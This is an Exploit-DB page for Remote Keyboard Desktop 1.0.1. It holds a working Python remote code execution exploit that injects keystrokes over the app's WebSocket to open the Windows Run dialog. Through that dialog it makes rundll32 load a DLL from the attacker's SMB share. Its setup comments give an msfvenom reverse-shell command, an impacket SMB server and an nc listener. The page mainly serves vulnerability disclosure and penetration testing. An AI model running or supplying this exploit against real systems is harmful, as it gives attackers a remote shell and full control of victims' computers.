Remote Keyboard Desktop 1.0.1 - Remote Code Execution (RCE)

EDB-ID:

52299

CVE:

N/A

EDB Verified:

Author:

Chokri Hammedi

Type:

remote

Exploit: /

Platform:

Windows

Date:

2025-05-21

Vulnerable App:

# Exploit Title: Remote Keyboard Desktop 1.0.1 - Remote Code Execution (RCE)
# Date: 05/17/2025
# Exploit Author: Chokri Hammedi
# Vendor Homepage: https://remotecontrolio.web.app/
# Software Link: https://apps.microsoft.com/detail/9n0jw8v5sc9m?hl=neutral&gl=US&ocid=pdpshare
# Version: 1.0.1
# Tested on: Windows 10 Pro Build 19045

# Start Remote Keyboard Desktop on your windows
# Preparing:
#
# 1. Generating payload (dll/exe):
# msfvenom -p windows/shell_reverse_tcp LHOST=192.168.8.105 LPORT=8080 -f dll > shell.dll
# 2. Start smb server: impacket-smbserver SHARE . -smb2support
# 3. nc -lnvp 8080
# 4. python exploit.py
#####

#!/usr/bin/env python3

import websocket
import json
import time

target = "192.168.8.105"
lhost = "192.168.8.101"
WS_URL = f"ws://{target}:8080/"
payload = "shell2.dll" # payload dll/exe filename
debug = False

HEADER_LIST = [
    "User-Agent: Dart/3.7 (dart:io)",
    f"Origin: http://{target}:8080",
    "Sec-WebSocket-Extensions: permessage-deflate; client_max_window_bits"
]

#SMB_PATH = f"cmd /c \\\\{lhost}\\SHARE\\{payload}" # exe based

SMB_PATH = f"rundll32.exe \\\\{lhost}\\SHARE\\{payload},ExportedFunc" # dll
based

special_mapping = {
    ' ': ("SPACE", False),
    '/': ("NUMPAD_DIVIDE", False),
    '\\': ("\\", False),
    '.': ("NUMPAD_DECIMAL", False),
    ',': (",", False),
}

def send_key_event(ws, key, key_down):
    event = {"command": "keyboard_event", "data": {"key": key, "keyDown":
key_down, "capsLock": False}}
    ws.send(json.dumps(event))

def send_text(ws, text, delay=0.05):
    shift_pressed = False
    for ch in text:
        if ch in special_mapping:
            key_name, need_shift = special_mapping[ch]
        elif ch.isalpha():
            need_shift = ch.isupper()
            key_name = ch.upper()
        elif ch.isdigit():
            key_name = ch
            need_shift = False
        else:
            raise ValueError(f"No key mapping for character: {ch!r}")

        if need_shift and not shift_pressed:
            send_key_event(ws, "SHIFT", True)
            shift_pressed = True
        elif not need_shift and shift_pressed:
            send_key_event(ws, "SHIFT", False)
            shift_pressed = False

        send_key_event(ws, key_name, True)
        send_key_event(ws, key_name, False)
        time.sleep(delay)

    if shift_pressed:
        send_key_event(ws, "SHIFT", False)

def send_key(ws, keys, delay=0.05):
    for key in keys:
        send_key_event(ws, key, True)
    time.sleep(delay)
    for key in reversed(keys):
        send_key_event(ws, key, False)

def on_open(ws):
    print ("Let's start!")

    send_key(ws, ["LEFT_WINDOWS", "R"])
    time.sleep(0.5)

    send_text(ws, SMB_PATH)
    send_key(ws, ["RETURN"])
    print ("Executing...")
    time.sleep(1.2)

    print("Check your listener!")
    if debug:

            print("\033[42;37mExploit by blue0x1 - github.com/blue0x1\033[0m
")

    ws.close()

def on_message(ws, message):
    if debug:
        print("[=] Received:", message)

def on_error(ws, error):
    if debug:
        print("[!] Error:", error)

def on_close(ws, code, reason):
    if debug:
        print(f"[x] Closed: {code} - {reason}")

if __name__ == "__main__":
    websocket.enableTrace(debug)
    ws = websocket.WebSocketApp(
        WS_URL,
        header=HEADER_LIST,
        on_open=on_open,
        on_message=on_message,
        on_error=on_error,
        on_close=on_close
    )

    ws.run_forever()

Tags:

Advisory/Source: Link

Databases	Links	Sites	Solutions
Exploits	Search Exploit-DB	OffSec	Courses and Certifications
Google Hacking	Submit Entry	Kali Linux	Learn Subscriptions
Papers	SearchSploit Manual	VulnHub	OffSec Cyber Range
Shellcodes	Exploit Statistics		Proving Grounds
			Penetration Testing Services